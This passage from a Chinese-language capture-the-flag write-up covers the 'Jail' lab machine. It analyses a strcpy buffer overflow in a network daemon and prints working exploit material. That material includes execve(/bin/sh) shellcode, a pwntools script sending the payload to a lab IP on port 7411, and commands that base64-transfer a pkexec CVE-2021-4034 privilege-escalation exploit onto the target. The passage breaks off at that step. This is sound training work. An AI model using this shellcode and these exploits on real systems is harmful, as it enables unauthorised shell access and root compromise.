&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="k">if&lt;/span> &lt;span class="o">(&lt;/span>&lt;span class="nv">pid&lt;/span> &lt;span class="o">==&lt;/span> 0&lt;span class="o">)&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> close&lt;span class="o">(&lt;/span>sockfd&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> exit&lt;span class="o">(&lt;/span>handle&lt;span class="o">(&lt;/span>newsockfd&lt;span class="o">))&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span> &lt;span class="k">else&lt;/span> &lt;span class="o">{&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> close&lt;span class="o">(&lt;/span>newsockfd&lt;span class="o">)&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="o">}&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="代码分析">代码分析：&lt;/h3>
&lt;p>建立了一个套接字，&lt;code>AF_INET&lt;/code>(ipv4),&lt;code>SOCK_STREAM&lt;/code>(tcp连接)，等会用&lt;code>nc&lt;/code>作为客户端交互就行&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_6F61OB1oUo_hu3436091fd8d7dab8d014afd1e6ddfe54_17658_578a64700ff95d99bcc2198cd6a7cc2a.webp 400w,
/post/hackbox/jail/image/image_6F61OB1oUo_hu3436091fd8d7dab8d014afd1e6ddfe54_17658_f2887ca1ebb5d2d3fb0018c471ad7688.webp 760w,
/post/hackbox/jail/image/image_6F61OB1oUo_hu3436091fd8d7dab8d014afd1e6ddfe54_17658_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_6F61OB1oUo_hu3436091fd8d7dab8d014afd1e6ddfe54_17658_578a64700ff95d99bcc2198cd6a7cc2a.webp"
width="641"
height="135"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>监听端口7411，fork子进程调用&lt;code>handle()&lt;/code>，实现功能的代码都在&lt;code>handle()&lt;/code>，结合nmap发现打开了7411端口，应该就是这个程序&lt;code>jail&lt;/code>&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_u34Hmncnpr_hudd4f2adf1c1afcde635dd0558976217b_63369_60ec10d694c656c90d852d537d4aa633.webp 400w,
/post/hackbox/jail/image/image_u34Hmncnpr_hudd4f2adf1c1afcde635dd0558976217b_63369_7bfee2b32cd71aa8fe5bf43f2951a9a0.webp 760w,
/post/hackbox/jail/image/image_u34Hmncnpr_hudd4f2adf1c1afcde635dd0558976217b_63369_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_u34Hmncnpr_hudd4f2adf1c1afcde635dd0558976217b_63369_60ec10d694c656c90d852d537d4aa633.webp"
width="942"
height="518"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>分析&lt;code>handle()&lt;/code>有以下几种交互，&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">DEBUG 调试模式
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#auth认证函数，硬编码，这里其实验证密码正确了，也没有什么后续的逻辑操作&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#char username[256];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#char password[256];&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">USER admin 验证用户名
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">PASS 1974jailbreak! 验证密码
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#这两个功能只是打印字符串，什么也不做&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">OPEN 打开监狱
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">CLOSE 关闭监狱
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>进入DEBUG调试模式&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_JdyKsZFFe4_hudd3243148b497b430f4dad0ae4a5dab5_20054_9bc5a3004690085c9805f9220e5498e6.webp 400w,
/post/hackbox/jail/image/image_JdyKsZFFe4_hudd3243148b497b430f4dad0ae4a5dab5_20054_c5e4ff1710c0ecd498074b766907f40c.webp 760w,
/post/hackbox/jail/image/image_JdyKsZFFe4_hudd3243148b497b430f4dad0ae4a5dab5_20054_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_JdyKsZFFe4_hudd3243148b497b430f4dad0ae4a5dab5_20054_9bc5a3004690085c9805f9220e5498e6.webp"
width="773"
height="132"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>当先执行DEBUG模式，再进行密码认证的时候。会打印密码&lt;code>userpass&lt;/code>的内存地址&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_1wtt49SBex_hub348990e220ede34e14a5c0e74a5ec37_26369_84d1751c4372af5ff33607fe4018b0fe.webp 400w,
/post/hackbox/jail/image/image_1wtt49SBex_hub348990e220ede34e14a5c0e74a5ec37_26369_01bfbfe253d8c060f9a2b28e5d76c217.webp 760w,
/post/hackbox/jail/image/image_1wtt49SBex_hub348990e220ede34e14a5c0e74a5ec37_26369_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_1wtt49SBex_hub348990e220ede34e14a5c0e74a5ec37_26369_84d1751c4372af5ff33607fe4018b0fe.webp"
width="734"
height="190"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>打印了&lt;code>userpass&lt;/code>的缓冲区地址&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_1BK2kYD7yJ_hu307bb32f1844ef3d4dfd2435c83302cc_12776_5d08b98fc42ea539395843389f6c7e8a.webp 400w,
/post/hackbox/jail/image/image_1BK2kYD7yJ_hu307bb32f1844ef3d4dfd2435c83302cc_12776_3810285162960dd04f345226dc6866bc.webp 760w,
/post/hackbox/jail/image/image_1BK2kYD7yJ_hu307bb32f1844ef3d4dfd2435c83302cc_12776_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_1BK2kYD7yJ_hu307bb32f1844ef3d4dfd2435c83302cc_12776_5d08b98fc42ea539395843389f6c7e8a.webp"
width="446"
height="186"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>通过重复执行，发现&lt;code>userpass&lt;/code> 缓冲区地址是静态的&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_yNyukdWbeU_huff8292dc3de74fe772baaf0442167a55_22910_230afefc9229c3e07e4b5076aa0e5206.webp 400w,
/post/hackbox/jail/image/image_yNyukdWbeU_huff8292dc3de74fe772baaf0442167a55_22910_d4421c4382bf7d109a2fe124dd25f230.webp 760w,
/post/hackbox/jail/image/image_yNyukdWbeU_huff8292dc3de74fe772baaf0442167a55_22910_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_yNyukdWbeU_huff8292dc3de74fe772baaf0442167a55_22910_230afefc9229c3e07e4b5076aa0e5206.webp"
width="556"
height="212"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="漏洞的关键点">漏洞的关键点&lt;/h3>
&lt;p>代码第21行&lt;code>strcpy()&lt;/code> 将&lt;code>password[256]&lt;/code>的值复制到&lt;code>userpass[16]&lt;/code> ，导致&lt;code>userpass&lt;/code>可以造成缓冲区溢出，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_a4_6jQo-uh_hu6147a447c12c8ac51987dc287d8447bc_60043_d78704ac8669885a2c143200fe29904a.webp 400w,
/post/hackbox/jail/image/image_a4_6jQo-uh_hu6147a447c12c8ac51987dc287d8447bc_60043_59fda1cd0465b8136d071ebf2975666c.webp 760w,
/post/hackbox/jail/image/image_a4_6jQo-uh_hu6147a447c12c8ac51987dc287d8447bc_60043_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_a4_6jQo-uh_hu6147a447c12c8ac51987dc287d8447bc_60043_d78704ac8669885a2c143200fe29904a.webp"
width="859"
height="457"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>结合&lt;code>compile.sh&lt;/code>脚本禁用了DEP，并且&lt;code>userpass&lt;/code>的地址是静态的，可以尝试写入&lt;code>shellcode&lt;/code> 执行命令&lt;/p>
&lt;h4 id="ida调试">IDA调试&lt;/h4>
&lt;p>计算偏移量，strcpy()处下断点，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_5GnZ3W8I5h_hu20c4b542586b9fc914159ca5b644ac49_19788_47abd43ba732a6f9c3d76776714f7401.webp 400w,
/post/hackbox/jail/image/image_5GnZ3W8I5h_hu20c4b542586b9fc914159ca5b644ac49_19788_f185a3809d204baec31456244e79e8c3.webp 760w,
/post/hackbox/jail/image/image_5GnZ3W8I5h_hu20c4b542586b9fc914159ca5b644ac49_19788_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_5GnZ3W8I5h_hu20c4b542586b9fc914159ca5b644ac49_19788_47abd43ba732a6f9c3d76776714f7401.webp"
width="451"
height="263"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>50个字符串已经崩溃&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_jij6ItP3Jg_hue66db60f20ac44f2c33620312c0fadf6_19281_482558b47f208cba6596a9c1c8dff71c.webp 400w,
/post/hackbox/jail/image/image_jij6ItP3Jg_hue66db60f20ac44f2c33620312c0fadf6_19281_7296400fdc97da1a6c5117981c397c6b.webp 760w,
/post/hackbox/jail/image/image_jij6ItP3Jg_hue66db60f20ac44f2c33620312c0fadf6_19281_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_jij6ItP3Jg_hue66db60f20ac44f2c33620312c0fadf6_19281_482558b47f208cba6596a9c1c8dff71c.webp"
width="627"
height="260"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>FFFFCAC0-FFFFCAA0=20,十进制就是32字节，要留4个字节写return到shellcode(),所以偏移量是&lt;code>28&lt;/code>字节。&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_uEn7dgEuTH_hu10d596d27a4f34bbf9f23d2d453ab15b_53517_cf44bf80ba26d5adc0179cb7e528c25f.webp 400w,
/post/hackbox/jail/image/image_uEn7dgEuTH_hu10d596d27a4f34bbf9f23d2d453ab15b_53517_8c7b56ce95fae457f77486f7c72d7a5d.webp 760w,
/post/hackbox/jail/image/image_uEn7dgEuTH_hu10d596d27a4f34bbf9f23d2d453ab15b_53517_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_uEn7dgEuTH_hu10d596d27a4f34bbf9f23d2d453ab15b_53517_cf44bf80ba26d5adc0179cb7e528c25f.webp"
width="562"
height="564"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>构造exp&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#插入字符由：填充字符+ret地址+结束符+shellcode组成&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#填充字符到ESP，28个字符，python -c &amp;#39;print(&amp;#34;A&amp;#34;*28)&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">AAAAAAAAAAAAAAAAAAAAAAAAAAAA
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#16进制userpass的内存地址+结束符（0xffffcaa0+ \x00）&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="se">\x&lt;/span>c0&lt;span class="se">\x&lt;/span>ca&lt;span class="se">\x&lt;/span>ff&lt;span class="se">\x&lt;/span>ff
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1">#shellcode&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">&amp;#34;\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
&lt;/span>&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="s2">\x89\xe3\x31\xc9\xcd\x80&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>在auth() return处下个断点，&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_2m9oq3dL6r_huebb30fcaec2a709c014a0c12aadb5a9d_58318_2889d040761b1486e29e37639546e6ba.webp 400w,
/post/hackbox/jail/image/image_2m9oq3dL6r_huebb30fcaec2a709c014a0c12aadb5a9d_58318_04fa28956078cc1a770908b006e4f73e.webp 760w,
/post/hackbox/jail/image/image_2m9oq3dL6r_huebb30fcaec2a709c014a0c12aadb5a9d_58318_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_2m9oq3dL6r_huebb30fcaec2a709c014a0c12aadb5a9d_58318_2889d040761b1486e29e37639546e6ba.webp"
width="840"
height="625"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>调试跟进发现shellcode已经被转换成汇编代码执行，这段汇编代码实现Linux/x86 - execve(/bin/sh)&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_IJWjunTdVz_hu327fec7ca9060d72ec986bf907fabb69_63153_e251138fc701a90e7239c5dc809c7a2b.webp 400w,
/post/hackbox/jail/image/image_IJWjunTdVz_hu327fec7ca9060d72ec986bf907fabb69_63153_0983d58d4def07608fc0e5226b1d566e.webp 760w,
/post/hackbox/jail/image/image_IJWjunTdVz_hu327fec7ca9060d72ec986bf907fabb69_63153_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_IJWjunTdVz_hu327fec7ca9060d72ec986bf907fabb69_63153_e251138fc701a90e7239c5dc809c7a2b.webp"
width="775"
height="694"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>&lt;a href="https://www.exploit-db.com/exploits/34060" target="_blank" rel="noopener">https://www.exploit-db.com/exploits/34060&lt;/a>&lt;/p>
&lt;p>执行完这段汇编代码即可返回&lt;code>sh shell&lt;/code>&lt;/p>
&lt;p>python实现脚本&lt;code> exp.py&lt;/code>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="line">&lt;span class="cl">&lt;span class="ch">#!/usr/bin/env python3&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="kn">from&lt;/span> &lt;span class="nn">pwn&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="o">*&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">userpass_addr&lt;/span>&lt;span class="o">=&lt;/span> &lt;span class="nb">int&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sa">b&lt;/span>&lt;span class="s1">&amp;#39;0xffffd610&amp;#39;&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="mi">16&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="c1">#这个地址要先通过DEBUG获取&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">if&lt;/span> &lt;span class="n">args&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s1">&amp;#39;REMOTE&amp;#39;&lt;/span>&lt;span class="p">]:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;10.10.10.34&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="k">else&lt;/span>&lt;span class="p">:&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl"> &lt;span class="n">ip&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s1">&amp;#39;127.0.0.1&amp;#39;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="c1"># Get Leaked Address&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">shellcode&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">shellcode&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">shellcode&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">shellcode&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">shellcode&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="se">\x89\xe3\x31\xc9\xcd\x80&lt;/span>&lt;span class="s2">&amp;#34;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">payload&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;A&amp;#34;&lt;/span>&lt;span class="o">*&lt;/span>&lt;span class="mi">28&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">payload&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="n">p32&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">userpass_addr&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="mi">32&lt;/span> &lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">payload&lt;/span> &lt;span class="o">+=&lt;/span> &lt;span class="n">shellcode&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">remote&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">ip&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="mi">7411&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">recvuntil&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;OK Ready. Send USER command.&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sendline&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;USER admin&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">recvuntil&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;OK Send PASS command.&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">sendline&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sa">b&lt;/span>&lt;span class="s2">&amp;#34;PASS &amp;#34;&lt;/span> &lt;span class="o">+&lt;/span> &lt;span class="n">payload&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="n">p&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">interactive&lt;/span>&lt;span class="p">()&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>=====================================================&lt;/p>
&lt;p>到这里分析结束，回到题目&lt;/p>
&lt;h3 id="获取nobody-shell">获取nobody shell&lt;/h3>
&lt;p>先获取userpass_addr地址&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_Ia0yMTi3g6_hu45cf9653203e0e7daf275b141d06b616_13152_9db4f8b6877fce2269d05a5c5854b475.webp 400w,
/post/hackbox/jail/image/image_Ia0yMTi3g6_hu45cf9653203e0e7daf275b141d06b616_13152_d14ca503e7c9ade55f13c13cf1895bf7.webp 760w,
/post/hackbox/jail/image/image_Ia0yMTi3g6_hu45cf9653203e0e7daf275b141d06b616_13152_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_Ia0yMTi3g6_hu45cf9653203e0e7daf275b141d06b616_13152_9db4f8b6877fce2269d05a5c5854b475.webp"
width="439"
height="191"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>执行&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_a2wJKedLn__huf1a22c91f5c01b263585e883de8a6253_12874_35aa11859e38faf5e6e1c119c4c3bad7.webp 400w,
/post/hackbox/jail/image/image_a2wJKedLn__huf1a22c91f5c01b263585e883de8a6253_12874_c4eb62c933935a5e857c2163ac2f3019.webp 760w,
/post/hackbox/jail/image/image_a2wJKedLn__huf1a22c91f5c01b263585e883de8a6253_12874_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_a2wJKedLn__huf1a22c91f5c01b263585e883de8a6253_12874_35aa11859e38faf5e6e1c119c4c3bad7.webp"
width="902"
height="139"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;h3 id="pkexec提权一步到位非预期解">pkexec提权一步到位(非预期解)&lt;/h3>
&lt;p>============================================================&lt;/p>
&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_eZpjj4i5vO_hub9f94366a6f938345c59b7c0ccc5473c_8943_9b8611ace69e4ec9d6a2ec218321782c.webp 400w,
/post/hackbox/jail/image/image_eZpjj4i5vO_hub9f94366a6f938345c59b7c0ccc5473c_8943_b329ab82a3425289a89778754e5b730d.webp 760w,
/post/hackbox/jail/image/image_eZpjj4i5vO_hub9f94366a6f938345c59b7c0ccc5473c_8943_1920x1080_fit_q100_h2_lanczos_3.webp 1200w"
src="https://docs.kaiasec.tk/post/hackbox/jail/image/image_eZpjj4i5vO_hub9f94366a6f938345c59b7c0ccc5473c_8943_9b8611ace69e4ec9d6a2ec218321782c.webp"
width="908"
height="91"
loading="lazy" data-zoomable />&lt;/div>
&lt;/div>&lt;/figure>
&lt;/p>
&lt;p>本来想curl传脚本过去，但是好像超时了，不给访问网络，不知道是有策略还是什么原因&lt;/p>
&lt;p>所以直接写&lt;/p>
&lt;p>&lt;a href="https://github.com/dadvlingd/-CVE-2021-4034" target="_blank" rel="noopener">https://github.com/dadvlingd/-CVE-2021-4034&lt;/a>&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="line">&lt;span class="cl">cat CVE-2021-4034-py2.py &lt;span class="p">|&lt;/span>base64
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">&lt;span class="nb">echo&lt;/span> &lt;span class="s1">&amp;#39;{编码后的内容}&amp;#39;&lt;/span> &amp;gt;/tmp/pk_base64
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">
&lt;/span>&lt;/span>&lt;span class="line">&lt;span class="cl">cat /tmp/pk_base64&lt;span class="p">|&lt;/span>base64 -d &amp;gt;/tmp/pk.py
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>
&lt;figure >
&lt;div class="d-flex justify-content-center">
&lt;div class="w-100" >&lt;img alt="" srcset="
/post/hackbox/jail/image/image_Fzo7Ebs0iy_hu08887144fbf0555fd760baca000ab397_38568_57c05944a79f3e345b1831bee5658a55.webp 400w,
/post/hackbox/jail/image/image_Fzo7Ebs0iy_hu08887144fbf0555fd760baca000ab397_38568_fdfa86285c44842cc5da1f3ed878e7e4.webp 760w,
